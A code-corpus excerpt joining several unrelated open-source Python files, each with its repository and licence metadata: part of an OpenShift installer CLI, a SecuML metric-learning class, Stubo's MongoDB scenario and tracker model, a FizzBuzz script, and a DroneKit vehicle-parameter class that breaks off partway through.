if oo_cfg.settings.get('variant', '') == '':
variant, version = get_variant_and_version()
oo_cfg.settings['variant'] = variant.name
oo_cfg.settings['variant_version'] = version.name
click.clear()
if not oo_cfg.hosts:
oo_cfg.hosts = collect_hosts(version=oo_cfg.settings['variant_version'])
click.clear()
return oo_cfg
def collect_new_nodes():
click.clear()
click.echo('*** New Node Configuration ***')
message = """
Add new nodes here
"""
click.echo(message)
return collect_hosts(masters_set=True, print_summary=False)
def get_installed_hosts(hosts, callback_facts):
installed_hosts = []
for host in hosts:
if(host.connect_to in callback_facts.keys()
and 'common' in callback_facts[host.connect_to].keys()
and callback_facts[host.connect_to]['common'].get('version', '')
and callback_facts[host.connect_to]['common'].get('version', '') != 'None'):
installed_hosts.append(host)
return installed_hosts
# pylint: disable=too-many-branches
# This pylint error will be corrected shortly in separate PR.
def get_hosts_to_run_on(oo_cfg, callback_facts, unattended, force, verbose):
# Copy the list of existing hosts so we can remove any already installed nodes.
hosts_to_run_on = list(oo_cfg.hosts)
# Check if master or nodes already have something installed
installed_hosts = get_installed_hosts(oo_cfg.hosts, callback_facts)
if len(installed_hosts) > 0:
click.echo('Installed environment detected.')
# This check has to happen before we start removing hosts later in this method
if not force:
if not unattended:
click.echo('By default the installer only adds new nodes ' \
'to an installed environment.')
response = click.prompt('Do you want to (1) only add additional nodes or ' \
'(2) reinstall the existing hosts ' \
'potentially erasing any custom changes?',
type=int)
# TODO: this should be reworked with error handling.
# Click can certainly do this for us.
# This should be refactored as soon as we add a 3rd option.
if response == 1:
force = False
if response == 2:
force = True
# present a message listing already installed hosts and remove hosts if needed
for host in installed_hosts:
if host.master:
click.echo("{} is already an OpenShift Master".format(host))
# Masters stay in the list, we need to run against them when adding
# new nodes.
elif host.node:
click.echo("{} is already an OpenShift Node".format(host))
# force is only used for reinstalls so we don't want to remove
# anything.
if not force:
hosts_to_run_on.remove(host)
# Handle the cases where we know about uninstalled systems
new_hosts = set(hosts_to_run_on) - set(installed_hosts)
if len(new_hosts) > 0:
for new_host in new_hosts:
click.echo("{} is currently uninstalled".format(new_host))
# Fall through
click.echo('Adding additional nodes...')
else:
if unattended:
if not force:
click.echo('Installed environment detected and no additional ' \
'nodes specified: aborting. If you want a fresh install, use ' \
'`atomic-openshift-installer install --force`')
sys.exit(1)
else:
if not force:
new_nodes = collect_new_nodes()
hosts_to_run_on.extend(new_nodes)
oo_cfg.hosts.extend(new_nodes)
openshift_ansible.set_config(oo_cfg)
click.echo('Gathering information from hosts...')
callback_facts, error = openshift_ansible.default_facts(oo_cfg.hosts, verbose)
if error:
click.echo("There was a problem fetching the required information. See " \
"{} for details.".format(oo_cfg.settings['ansible_log_path']))
sys.exit(1)
else:
pass # proceeding as normal should do a clean install
return hosts_to_run_on, callback_facts
@click.group()
@click.pass_context
@click.option('--unattended', '-u', is_flag=True, default=False)
@click.option('--configuration', '-c',
type=click.Path(file_okay=True,
dir_okay=False,
writable=True,
readable=True),
default=None)
@click.option('--ansible-playbook-directory',
'-a',
type=click.Path(exists=True,
file_okay=False,
dir_okay=True,
readable=True),
# callback=validate_ansible_dir,
default=DEFAULT_PLAYBOOK_DIR,
envvar='OO_ANSIBLE_PLAYBOOK_DIRECTORY')
@click.option('--ansible-config',
type=click.Path(file_okay=True,
dir_okay=False,
writable=True,
readable=True),
default=None)
@click.option('--ansible-log-path',
type=click.Path(file_okay=True,
dir_okay=False,
writable=True,
readable=True),
default="/tmp/ansible.log")
@click.option('-v', '--verbose',
is_flag=True, default=False)
#pylint: disable=too-many-arguments
#pylint: disable=line-too-long
# Main CLI entrypoint, not much we can do about too many arguments.
def cli(ctx, unattended, configuration, ansible_playbook_directory, ansible_config, ansible_log_path, verbose):
"""
atomic-openshift-installer makes the process for installing OSE or AEP
easier by interactively gathering the data needed to run on each host.
It can also be run in unattended mode if provided with a configuration file.
Further reading: https://docs.openshift.com/enterprise/latest/install_config/install/quick_install.html
"""
ctx.obj = {}
ctx.obj['unattended'] = unattended
ctx.obj['configuration'] = configuration
ctx.obj['ansible_config'] = ansible_config
ctx.obj['ansible_log_path'] = ansible_log_path
ctx.obj['verbose'] = verbose
try:
oo_cfg = OOConfig(ctx.obj['configuration'])
except OOConfigInvalidHostError as e:
click.echo(e)
sys.exit(1)
# If no playbook dir on the CLI, check the config:
if not ansible_playbook_directory:
ansible_playbook_directory = oo_cfg.settings.get('ansible_playbook_directory', '')
# If still no playbook dir, check for the default location:
if not ansible_playbook_directory and os.path.exists(DEFAULT_PLAYBOOK_DIR):
ansible_playbook_directory = DEFAULT_PLAYBOOK_DIR
validate_ansible_dir(ansible_playbook_directory)
oo_cfg.settings['ansible_playbook_directory'] = ansible_playbook_directory
oo_cfg.ansible_playbook_directory = ansible_playbook_directory
ctx.obj['ansible_playbook_directory'] = ansible_playbook_directory
if ctx.obj['ansible_config']:
oo_cfg.settings['ansible_config'] = ctx.obj['ansible_config']
elif 'ansible_config' not in oo_cfg.settings and \
os.path.exists(DEFAULT_ANSIBLE_CONFIG):
# If we're installed by RPM this file should exist and we can use it as our default:
oo_cfg.settings['ansible_config'] = DEFAULT_ANSIBLE_CONFIG
oo_cfg.settings['ansible_log_path'] = ctx.obj['ansible_log_path']
ctx.obj['oo_cfg'] = oo_cfg
openshift_ansible.set_config(oo_cfg)
@click.command()
@click.pass_context
def uninstall(ctx):
oo_cfg = ctx.obj['oo_cfg']
verbose = ctx.obj['verbose']
if len(oo_cfg.hosts) == 0:
click.echo("No hosts defined in: %s" % oo_cfg.config_path)
sys.exit(1)
click.echo("OpenShift will be uninstalled from the following hosts:\n")
if not ctx.obj['unattended']:
# Prompt interactively to confirm:
for host in oo_cfg.hosts:
click.echo(" * %s" % host.connect_to)
proceed = click.confirm("\nDo you wish to proceed?")
if not proceed:
click.echo("Uninstall cancelled.")
sys.exit(0)
openshift_ansible.run_uninstall_playbook(verbose)
@click.command()
@click.pass_context
def upgrade(ctx):
oo_cfg = ctx.obj['oo_cfg']
verbose = ctx.obj['verbose']
if len(oo_cfg.hosts) == 0:
click.echo("No hosts defined in: %s" % oo_cfg.config_path)
sys.exit(1)
    # Update config to reflect the version we're targeting; we'll write
# to disk once ansible completes successfully, not before.
old_variant = oo_cfg.settings['variant']
old_version = oo_cfg.settings['variant_version']
if oo_cfg.settings['variant'] == 'enterprise':
oo_cfg.settings['variant'] = 'openshift-enterprise'
version = find_variant(oo_cfg.settings['variant'])[1]
oo_cfg.settings['variant_version'] = version.name
click.echo("Openshift will be upgraded from %s %s to %s %s on the following hosts:\n" % (
old_variant, old_version, oo_cfg.settings['variant'],
oo_cfg.settings['variant_version']))
for host in oo_cfg.hosts:
click.echo(" * %s" % host.connect_to)
if not ctx.obj['unattended']:
# Prompt interactively to confirm:
proceed = click.confirm("\nDo you wish to proceed?")
if not proceed:
click.echo("Upgrade cancelled.")
sys.exit(0)
retcode = openshift_ansible.run_upgrade_playbook(verbose)
if retcode > 0:
click.echo("Errors encountered during upgrade, please check %s." %
oo_cfg.settings['ansible_log_path'])
else:
oo_cfg.save_to_disk()
click.echo("Upgrade completed! Rebooting all hosts is recommended.")
@click.command()
@click.option('--force', '-f', is_flag=True, default=False)
@click.pass_context
def install(ctx, force):
oo_cfg = ctx.obj['oo_cfg']
verbose = ctx.obj['verbose']
if ctx.obj['unattended']:
error_if_missing_info(oo_cfg)
else:
oo_cfg = get_missing_info_from_user(oo_cfg)
check_hosts_config(oo_cfg, ctx.obj['unattended'])
print_installation_summary(oo_cfg.hosts)
click.echo('Gathering information from hosts...')
callback_facts, error = openshift_ansible.default_facts(oo_cfg.hosts,
verbose)
if error:
click.echo("There was a problem fetching the required information. " \
"Please see {} for details.".format(oo_cfg.settings['ansible_log_path']))
sys.exit(1)
hosts_to_run_on, callback_facts = get_hosts_to_run_on(
oo_cfg, callback_facts, ctx.obj['unattended'], force, verbose)
click.echo('Writing config to: %s' % oo_cfg.config_path)
# We already verified this is not the case for unattended installs, so this can
# only trigger for live CLI users:
# TODO: if there are *new* nodes and this is a live install, we may need the user
# to confirm the settings for new nodes. Look into this once we're distinguishing
# between new and pre-existing nodes.
if len(oo_cfg.calc_missing_facts()) > 0:
confirm_hosts_facts(oo_cfg, callback_facts)
oo_cfg.save_to_disk()
click.echo('Ready to run installation process.')
message = """
If changes are needed please edit the config file above and re-run.
"""
if not ctx.obj['unattended']:
confirm_continue(message)
error = openshift_ansible.run_main_playbook(oo_cfg.hosts,
hosts_to_run_on, verbose)
if error:
# The bootstrap script will print out the log location.
message = """
An error was detected. After resolving the problem please relaunch the
installation process.
"""
click.echo(message)
sys.exit(1)
else:
message = """
The installation was successful!
If this is your first time installing please take a look at the Administrator
Guide for advanced options related to routing, storage, authentication and much
more:
http://docs.openshift.com/enterprise/latest/admin_guide/overview.html
"""
click.echo(message)
click.pause()
cli.add_command(install)
cli.add_command(upgrade)
cli.add_command(uninstall)
if __name__ == '__main__':
# This is expected behaviour for context passing with click library:
# pylint: disable=unexpected-keyword-arg
cli(obj={})
|
menren/openshift-ansible
|
utils/src/ooinstall/cli_installer.py
|
Python
|
apache-2.0
| 31,431 | 0.003213 |
from simple_model import *
|
grollins/foldkin
|
foldkin/simple/__init__.py
|
Python
|
bsd-2-clause
| 27 | 0 |
# SecuML
# Copyright (C) 2016 ANSSI
#
# SecuML is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# SecuML is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with SecuML. If not, see <http://www.gnu.org/licenses/>.
import metric_learn
import numpy as np
from .SemiSupervisedProjection import SemiSupervisedProjection
class Itml(SemiSupervisedProjection):
def __init__(self, conf):
SemiSupervisedProjection.__init__(self, conf)
self.projection = metric_learn.itml.ITML_Supervised()
def setProjectionMatrix(self):
self.projection_matrix = np.transpose(
self.pipeline.named_steps['projection'].transformer())
|
ah-anssi/SecuML
|
SecuML/core/DimensionReduction/Algorithms/Projection/Itml.py
|
Python
|
gpl-2.0
| 1,021 | 0 |
"""
:copyright: (c) 2015 by OpenCredo.
:license: GPLv3, see LICENSE for more details.
"""
from pymongo import MongoClient, DESCENDING, ASCENDING
import logging
from bson.objectid import ObjectId
from stubo.utils import asbool
from stubo.model.stub import Stub
import hashlib
import time
import motor
import os
default_env = {
'port': 27017,
'max_pool_size': 20,
'tz_aware': True,
'db': 'stubodb'
}
def coerce_mongo_param(k, v):
if k in ('port', 'max_pool_size'):
return int(v)
elif k in ('tz_aware',):
return asbool(v)
return v
log = logging.getLogger(__name__)
mongo_client = None
def motor_driver(settings):
"""
    Returns an asynchronous Motor client. If a user and password are provided in the config file, an authenticated connection is returned.
:param settings:
:return:
"""
# checking for environment variables
mongo_uri = os.getenv("MONGO_URI")
mongo_db = os.getenv("MONGO_DB")
if mongo_uri and mongo_db:
client = motor.MotorClient(mongo_uri)
log.info("MongoDB environment variables found: %s!" % mongo_uri)
return client[mongo_db]
# environment variables not found, looking for details from configuration file
user = settings.get('mongo.user', None)
password = settings.get('mongo.password', None)
if user and password:
uri = "mongodb://{user}:{password}@{host}:{port}/{database_name}".format(
user=user,
password=password,
host=settings['mongo.host'],
port=settings['mongo.port'],
database_name=settings['mongo.db']
)
client = motor.MotorClient(uri)
else:
client = motor.MotorClient(settings['mongo.host'], int(settings['mongo.port']))
return client[settings['mongo.db']]
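# Illustrative settings mapping for motor_driver(); the keys mirror the lookups above,
# the values are made up:
#
#   settings = {'mongo.host': 'localhost', 'mongo.port': '27017', 'mongo.db': 'stubodb',
#               # optional - when both are present an authenticated URI is built:
#               'mongo.user': 'stubo', 'mongo.password': 'secret'}
#   db = motor_driver(settings)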
def get_mongo_client():
return mongo_client
def get_connection(env=None):
"""
Gets MongoDB connection. If user and password provided - authenticates (logs in)
:param env: dictionary, example:
{'host': 'ds045454.mongolab.com',
'tz_aware': True,
'max_pool_size': 10,
'port': 45454}
:return: MongoClient
"""
# checking for environment variables
mongo_uri = os.getenv("MONGO_URI")
mongo_db = os.getenv("MONGO_DB")
if mongo_uri and mongo_db:
client = MongoClient(mongo_uri)
log.info("MongoDB environment variables found: %s!" % mongo_uri)
return client[mongo_db]
# environment variables not found, looking for details from configuration file
env = env or default_env
_env = env.copy()
dbname = _env.pop('db', None)
# if auth details supplied - getting details
user = password = None
if 'user' in _env:
user = _env.pop('user')
if 'password' in _env:
password = _env.pop('password')
client = MongoClient(**_env)
if dbname:
log.debug('using db={0}'.format(dbname))
client = getattr(client, dbname)
# authenticating
if user and password:
# if fails - throws exception which will be handled in run_stubo.py
client.authenticate(user, password)
log.info("Login to MongoDB successful!")
return client
class Scenario(object):
def __init__(self, db=None):
self.db = db or mongo_client
assert self.db
def get_stubs(self, name=None):
if name:
filter = {'scenario': name}
return self.db.scenario_stub.find(filter)
else:
return self.db.scenario_stub.find()
def get_pre_stubs(self, name=None):
if name:
query = {'scenario': name}
return self.db.pre_scenario_stub.find(query)
else:
return self.db.scenario_pre_stub.find()
def stub_count(self, name):
return self.get_stubs(name).count()
def get(self, name):
return self.db.scenario.find_one({'name': name})
def get_all(self, name=None):
if name:
cursor = self.db.scenario.find({'name': name})
else:
cursor = self.db.scenario.find()
return cursor
def insert(self, **kwargs):
return self.db.scenario.insert(kwargs)
def change_name(self, name, new_name):
"""
Rename scenario and all stubs
:param name: current scenario name
:param new_name: new scenario name
:return: statistics, how many stubs were changed
"""
# updating scenario stub collection. You have to specify all parameters as booleans up to the one that you
# actually want, in our case - the fourth parameter "multi" = True
# update(spec, document[, upsert=False[,
# manipulate=False[, safe=None[, multi=False[, check_keys=True[, **kwargs]]]]]])
response = {
'Old name': name,
"New name": new_name
}
try:
result = self.db.scenario_stub.update(
{'scenario': name}, {'$set': {'scenario': new_name}}, False, False, None, True)
try:
response['Stubs changed'] = result['nModified']
except KeyError:
# older versions of mongodb returns 'n' instead of 'nModified'
response['Stubs changed'] = result['n']
except Exception as ex1:
# this is probably KeyError, leaving Exception for debugging purposes
log.debug("Could not get STUB nModified key, result returned: %s. Error: %s" % (result, ex1))
except Exception as ex:
log.debug("Could not update scenario stub, got error: %s " % ex)
response['Stubs changed'] = 0
# updating pre stubs
try:
result = self.db.scenario_pre_stub.update(
{'scenario': name}, {'$set': {'scenario': new_name}}, False, False, None, True)
try:
response['Pre stubs changed'] = result['nModified']
except KeyError:
# older versions of mongodb returns 'n' instead of 'nModified'
response['Pre stubs changed'] = result['n']
except Exception as ex1:
log.debug("Could not get PRE STUB nModified key, result returned: %s. Error: %s" % (result, ex1))
except Exception as ex:
log.debug("Could not update scenario pre stub, got error: %s" % ex)
response['Pre stubs changed'] = 0
try:
# updating scenario itself
result = self.db.scenario.update({'name': name}, {'name': new_name})
try:
response['Scenarios changed'] = result['nModified']
except KeyError:
# older versions of mongodb returns 'n' instead of 'nModified'
response['Scenarios changed'] = result['n']
except Exception as ex1:
log.debug("Could not get SCENARIO nModified key, result returned: %s. Error: %s" % (result, ex1))
except Exception as ex:
log.debug("Could not update scenario, got error: %s" % ex)
response['Scenarios changed'] = 0
return response
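    # Rename sketch (scenario names are made up); the response keys are the ones
    # assembled in change_name() above:
    #
    #   result = Scenario(db).change_name('demo', 'demo_v2')
    #   # result -> {'Old name': 'demo', 'New name': 'demo_v2',
    #   #            'Stubs changed': n, 'Pre stubs changed': n, 'Scenarios changed': n}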
def recorded(self, name=None):
"""
Calculates scenario recorded date. If name is not supplied - returns a dictionary with scenario name and
recorded date:
{ 'scenario_1': '2015-05-07',
'scenario_2': '2015-05-07'}
If a name is supplied - returns recorded date string (since MongoDB does not support DateTimeField).
:param name: optional parameter to get recorded date for specific scenario
:return: <dict> - if name is not supplied, <string> with date - if scenario name supplied.
"""
start_time = time.time()
pipeline = [
{'$group': {
'_id': '$scenario',
'recorded': {'$max': '$recorded'}}}]
# use the pipe to calculate latest date
try:
result = self.db.command('aggregate', 'scenario_stub', pipeline=pipeline)['result']
except KeyError as ex:
log.error(ex)
return None
except Exception as ex:
log.error("Got error when trying to use aggregation framework: %s" % ex)
return None
# using dict comprehension to form a new dict for fast access to elements
result_dict = {x['_id']: x['recorded'] for x in result}
# finish time
finish_time = time.time()
log.info("Recorded calculated in %s ms" % int((finish_time - start_time) * 1000))
# if name is provided - return only single recorded date for specific scenario.
if name:
scenario_recorded = None
try:
scenario_recorded = result_dict[name]
except KeyError:
log.debug("Wrong scenario name supplied (%s)" % name)
except Exception as ex:
log.warn("Failed to get scenario recorded date for: %s, error: %s" % (name, ex))
return scenario_recorded
else:
# returning full list (scenarios and sizes)
return result_dict
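    # The two return modes documented above (illustrative data only):
    #
    #   Scenario(db).recorded()              # -> {'scenario_1': '2015-05-07', ...}
    #   Scenario(db).recorded('scenario_1')  # -> '2015-05-07', or None if the name is unknown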
def size(self, name=None):
"""
Calculates scenario sizes. If name is not supplied - returns a dictionary with scenario name and size
(in bytes):
{ 'scenario_1': 5646145,
'scenario_2': 12312312}
If a name is supplied - returns a size Integer in bytes.
:param name: optional parameter to get size of specific scenario
:return: <dict> - if name is not supplied, <int> - if scenario name supplied.
"""
start_time = time.time()
pipeline = [{
'$group': {
'_id': '$scenario',
'size': {'$sum': {'$divide': ['$space_used', 1024]}}
}
}]
# use the pipe to calculate scenario sizes
try:
result = self.db.command('aggregate', 'scenario_stub', pipeline=pipeline)['result']
except KeyError as ex:
log.error(ex)
return None
except Exception as ex:
log.error("Got error when trying to use aggregation framework: %s" % ex)
return None
# using dict comprehension to form a new dict for fast access to elements
result_dict = {x['_id']: x['size'] for x in result}
# finish time
finish_time = time.time()
log.info("Sizes calculated in %s ms" % int((finish_time - start_time) * 1000))
# if name is provided - return only single size for specific scenario.
if name:
scenario_size = None
try:
scenario_size = result_dict[name]
except KeyError:
log.debug("Wrong scenario name supplied (%s)" % name)
except Exception as ex:
log.warn("Failed to get scenario size for: %s, error: %s" % (name, ex))
return scenario_size
else:
# returning full list (scenarios and sizes)
return result_dict
def stub_counts(self):
"""
Calculates stub counts:
{ 'scenario_1': 100,
'scenario_2': 20}
        Note that if a scenario doesn't have any stubs it will not appear in this list, since this method does not
        access the scenario collection to add scenarios with 0 stubs.
:return: <dict>
"""
start_time = time.time()
pipeline = [{'$group': {
'_id': '$scenario',
'count': {'$sum': 1}
}
}]
# use the pipe to calculate scenario stub counts
try:
result = self.db.command('aggregate', 'scenario_stub', pipeline=pipeline)['result']
except KeyError as ex:
log.error(ex)
return None
except Exception as ex:
log.error("Got error when trying to use aggregation framework: %s" % ex)
return None
# using dict comprehension to form a new dict for fast access to elements
result_dict = {x['_id']: x['count'] for x in result}
# finish time
finish_time = time.time()
log.info("Stub counts calculated in %s ms" % int((finish_time - start_time) * 1000))
return result_dict
@staticmethod
def _create_hash(matchers):
"""
Creates a hash out of matchers list.
:param matchers: <list> matchers
:return: matchers md5 hash
"""
if matchers is not None:
return hashlib.md5(u"".join(unicode(matchers))).hexdigest()
elif matchers is None:
return None
def get_matched_stub(self, name, matchers_hash):
"""
Gets matched stub for specific scenario. Relies on indexed "matchers" key in scenario_stub object
:param name: <string> scenario name
:param matchers_hash: <string> matcher hash
:return: matched stub document or None if stub not found
"""
if name:
pattern = {'scenario': name,
'matchers_hash': matchers_hash}
return self.db.scenario_stub.find_one(pattern)
def insert_stub(self, doc, stateful):
"""
Insert stub into DB. Performs a check whether this stub already exists in database or not. If it exists
and stateful is True - new response is appended to the response list, else - reports that duplicate stub
found and it will not be inserted.
:param doc: Stub class with Stub that will be inserted
:param stateful: <boolean> specify whether stub insertion should be stateful or not
:return: <string> message with insertion status:
ignored - if not stateful and stub was already present
updated - if stateful and stub was already present
created - if stub was not present in database
"""
# getting initial values - stub matchers, scenario name
matchers = doc['stub'].contains_matchers()
scenario = doc['scenario']
matchers_hash = self._create_hash(matchers)
# check if we have matchers - should be None for REST calls
if matchers is not None:
# additional helper value for indexing
doc['matchers_hash'] = matchers_hash
matched_stub = self.get_matched_stub(name=scenario, matchers_hash=matchers_hash)
# checking if stub already exists
if matched_stub:
# creating stub object from found document
the_stub = Stub(matched_stub['stub'], scenario)
if not stateful and doc['stub'].response_body() == the_stub.response_body():
msg = 'duplicate stub found, not inserting.'
log.warn(msg)
result = {'status': 'ignored',
'msg': msg,
'key': str(matched_stub['_id'])}
return result
# since stateful is true - updating stub body by extending the list
log.debug('In scenario: {0} found exact match for matchers:'
' {1}. Perform stateful update of stub.'.format(scenario, matchers))
response = the_stub.response_body()
response.extend(doc['stub'].response_body())
the_stub.set_response_body(response)
# updating Stub body and size, writing to database
self.db.scenario_stub.update(
{'_id': matched_stub['_id']},
{'$set': {'stub': the_stub.payload,
'space_used': len(unicode(the_stub.payload))}})
result = {'status': 'updated',
'msg': 'Updated with stateful response',
'key': str(matched_stub['_id'])}
return result
# inserting stub into DB
status = self.db.scenario_stub.insert(self.get_stub_document(doc))
result = {'status': 'created',
'msg': 'Inserted scenario_stub',
'key': str(status)}
return result
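    # Outcome sketch for insert_stub(); the status values are the ones returned above:
    #
    #   result = Scenario(db).insert_stub(doc, stateful=True)
    #   # result['status'] is 'created', 'updated' or 'ignored';
    #   # result['key'] is the stringified _id of the affected scenario_stub document.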
@staticmethod
def get_stub_document(doc):
"""
prepares stub document for insertion into database
:param doc:
:return:
"""
doc['stub'] = doc['stub'].payload
# additional helper for aggregation framework
try:
doc['recorded'] = doc['stub']['recorded']
except KeyError:
# during tests "recorded" value is not supplied
pass
# calculating stub size
doc['space_used'] = len(unicode(doc['stub']))
return doc
def insert_pre_stub(self, scenario, stub):
status = self.db.pre_scenario_stub.insert(dict(scenario=scenario,
stub=stub.payload))
return 'inserted pre_scenario_stub: {0}'.format(status)
def remove_all(self, name):
self.db.scenario.remove({'name': name})
self.db.scenario_stub.remove({'scenario': name})
self.db.pre_scenario_stub.remove({'scenario': name})
def remove_all_older_than(self, name, recorded):
# recorded = yyyy-mm-dd
self.db.scenario_stub.remove({
'scenario': name,
'recorded': {"$lt": recorded}
})
self.db.pre_scenario_stub.remove({
'scenario': name,
'recorded': {"$lt": recorded}
})
if not self.stub_count(name):
self.db.scenario.remove({'name': name})
class Tracker(object):
def __init__(self, db=None):
self.db = db or mongo_client
def insert(self, track, write_concern=0):
# w=0 disables write ack
"""
Insert tracker doc into MongoDB and creates indexes for faster search.
:param track: tracker object
:param write_concern: 1 or 0, check mongo docs for more info
:return:
"""
forced_log_id = track.get('forced_log_id')
if forced_log_id:
track['_id'] = int(forced_log_id)
return self.db.tracker.insert(track, w=write_concern)
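    # Write-concern sketch (the track document is made up); semantics as noted above,
    # w=0 skips the write acknowledgement:
    #
    #   tracker = Tracker(db)
    #   tracker.insert(track_doc)                   # fire-and-forget logging
    #   tracker.insert(track_doc, write_concern=1)  # waits for the server acknowledgement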
def _create_index(self, key=None, direction=DESCENDING):
"""
Creates index for specific key, fails silently if index creation was unsuccessful. Key examples:
"host" , "scenario", "scenario", "request_params.session"
:param key: <string>
:param direction: ASCENDING or DESCENDING (from pymongo)
"""
if key:
try:
self.db.tracker.create_index(key, direction)
except Exception as ex:
log.debug("Could not create index (tracker collection) for key %s, got error: %s" % (key, ex))
def find_tracker_data(self, tracker_filter, skip, limit):
projection = {'start_time': 1, 'function': 1, 'return_code': 1, 'scenario': 1,
'stubo_response': 1, 'duration_ms': 1, 'request_params.session': 1,
'delay': 1}
if skip < 0:
skip = 0
# sorted on start_time descending
return self.db.tracker.find(tracker_filter, projection).sort('start_time',
-1).limit(limit).skip(skip)
def item_count(self, query=None):
"""
Total item counter for tracker collection.
:param query: query dict, example : { return_code: { $ne: 200 } }
:return:
"""
if query is not None:
return self.db.tracker.find(query).count()
else:
return self.db.tracker.count()
def find_tracker_data_full(self, _id):
return self.db.tracker.find_one({'_id': ObjectId(_id)})
def session_last_used(self, scenario, session, mode):
"""
Return the date this session was last used using the
last put/stub time (for record) or last get/response time otherwise.
"""
if mode == 'record':
function = 'put/stub'
else:
function = 'get/response'
host, scenario_name = scenario.split(':')
return self.db.tracker.find_one({
'host': host,
'scenario': scenario_name,
'request_params.session': session,
'function': function}, sort=[("start_time", DESCENDING)])
def get_last_playback(self, scenario, session, start_time):
start = self.db.tracker.find_one({
'scenario': scenario,
'request_params.session': session,
'request_params.mode': 'playback',
'function': 'begin/session',
'start_time': {"$lt": start_time}
}, {'start_time': 1}, sort=[("start_time", DESCENDING)])
end = self.db.tracker.find_one({
'scenario': scenario,
'request_params.session': session,
'function': 'end/session',
'start_time': {"$gt": start_time}
}, {'start_time': 1}, sort=[("start_time", DESCENDING)])
if not (start or end):
return []
project = {'start_time': 1, 'return_code': 1, 'stubo_response': 1,
'response_headers': 1, 'request_headers': 1, 'duration_ms': 1,
'request_params': 1, 'request_text': 1, 'delay': 1}
query = {
'scenario': scenario,
'request_params.session': session,
'function': 'get/response',
'start_time': {"$gt": start['start_time'],
"$lt": end['start_time']}
}
return self.db.tracker.find(query, project).sort("start_time",
ASCENDING)
def get_last_recording(self, scenario, session, end):
# find the last begin/session?mode=record from the last put/stub time
start = self.db.tracker.find_one({
'scenario': scenario,
'request_params.session': session,
'request_params.mode': 'record',
'function': 'begin/session',
'start_time': {"$lt": end}
}, {'start_time': 1}, sort=[("start_time", DESCENDING)])
if not start:
return []
project = {'start_time': 1, 'return_code': 1, 'stubo_response': 1,
'response_headers': 1, 'request_headers': 1, 'duration_ms': 1,
'request_params': 1, 'request_text': 1, 'delay': 1}
# get all the put/stubs > last begin/session?mode=record and <= last put/stub
query = {
'scenario': scenario,
'request_params.session': session,
'function': 'put/stub',
'start_time': {"$gt": start['start_time'],
"$lte": end}
}
log.debug('tracker.find: {0}'.format(query))
return self.db.tracker.find(query, project).sort("start_time",
ASCENDING)
def session_last_used(scenario, session_name, mode):
tracker = Tracker()
return tracker.session_last_used(scenario, session_name, mode)
|
Stub-O-Matic-BA/stubo-app
|
stubo/model/db.py
|
Python
|
gpl-3.0
| 23,064 | 0.002688 |
# from index import db
# class MyObject():
# def __init__(self):
# pass
# @staticmethod
# def get_something(arg1, arg2):
# return something
|
tferreira/Flask-Redis
|
application/models.py
|
Python
|
mit
| 170 | 0 |
n = 1
while n <= 100:
if (n % 3 == 0 and n % 5 == 0):
print "FizzBuzz"
elif (n % 3 == 0):
print "Fizz"
elif (n % 5 == 0):
print "Buzz"
else:
print n
n += 1
|
CorySpitzer/FizzBuzz
|
everest/FizzBuzz.py
|
Python
|
mit
| 175 | 0.091429 |
"""
The parameters class. It is initialized with the vehicle's attributes at time of construction
but it is constantly updated through attribute listeners after calling the add_listeners() function
These parameters can provide the basic info for a future collision avoidance scheme.
Any functions that can refer to the parameters can be written here.
Added support for "dummy" initialization for experimental purposes
"""
from dronekit import connect, Command, VehicleMode, LocationGlobalRelative, LocationGlobal, socket
import uuid, random, time
class Params:
def __init__(self, network=None, vehicle=None, dummy=False):
if dummy:
self.ID = random.randint(1000, 9999)
self.last_recv = time.time()
self.version = 1
self.ekf_ok = False
self.gps_fix = 3
self.gps_sat = 10
self.gps_eph = 100
self.gps_epv = 200
self.set_global_alt = True
self.set_attitude = True
self.mode = "AUTO"
self.global_alt = 10
self.global_lat = -35.3632086902
self.global_lon = 149.165274916
self.distance_from_self = None
self.mission_importance = 0
self.heading = 300 #degrees
self.next_wp = None
self.next_wp_lat = None
self.next_wp_lon = None
self.next_wp_alt = None
self.battery_level = 100 #percentage
self.velocity = [0.5, -3.1, 0.7] #m/s, airspeed
self.groundspeed = 3.46 #m/s
self.airspeed = 3.46 #m/s
self.system_status = "OK"
else:
self.ID = uuid.uuid4().int #Random UUID
self.last_recv = None
self.version = vehicle.version.release_version()
self.ekf_ok = vehicle.ekf_ok
self.gps_fix = vehicle.gps_0.fix_type
self.gps_sat = vehicle.gps_0.satellites_visible
self.gps_eph = vehicle.gps_0.eph
self.gps_epv = vehicle.gps_0.epv
self.set_global_alt = vehicle.capabilities.set_altitude_target_global_int
self.set_attitude = vehicle.capabilities.set_attitude_target
self.mode = vehicle.mode.name
self.global_alt = vehicle.location.global_relative_frame.alt
self.global_lat = vehicle.location.global_relative_frame.lat
self.global_lon = vehicle.location.global_relative_frame.lon
self.distance_from_self = None
self.mission_importance = 0 #default, for hobbyists and recreation
self.heading = vehicle.heading #degrees
self.next_wp = None
self.next_wp_lat = None
self.next_wp_lon = None
self.next_wp_alt = None
self.battery_level = vehicle.battery.level #percentage
self.velocity = vehicle.velocity #m/s, airspeed
self.groundspeed = vehicle.groundspeed #m/s
self.airspeed = vehicle.airspeed #m/s
self.system_status = vehicle.system_status.state
self.add_listeners(network, vehicle)
def add_listeners(self, network, vehicle):
"""
The function to observe updated values. These values must be contained in the params class
and a networking scheme (through drone_network) must be active.
        Object vehicle can be accessed through network.vehicle, but it is an input for
        the correct syntax of Python's decorator functions.
Any observers here are implemented based on the tutorial found in:
http://python.dronekit.io/automodule.html#dronekit.Locations.on_attribute
Some of the values pass through thresholding so as to limit writes.
Thresholding is done based on experience and needs
"""
if network == None:
print "No listeners added due to unknown network"
return
#State of System (Initializing, Emergency, etc.)
@vehicle.on_attribute('system_status')
def decorated_system_status_callback(self, attr_name, value):
network.vehicle_params.system_status = value.state
print 'System status changed to: ', network.vehicle_params.system_status
#Battery information
@vehicle.on_attribute('battery')
def decorated_battery_callback(self, attr_name, value):
if network.vehicle_params.battery_level == value.level:
pass
else:
network.vehicle_params.battery_level = value.level
#print 'Battery level: ', network.vehicle_params.battery_level
#Velocity information (m/s)
#return velocity in all three axis
@vehicle.on_attribute('velocity')
def decorated_velocity_callback(self, attr_name, value):
if network.vehicle_params.velocity == value:
pass
else:
network.vehicle_params.velocity = value
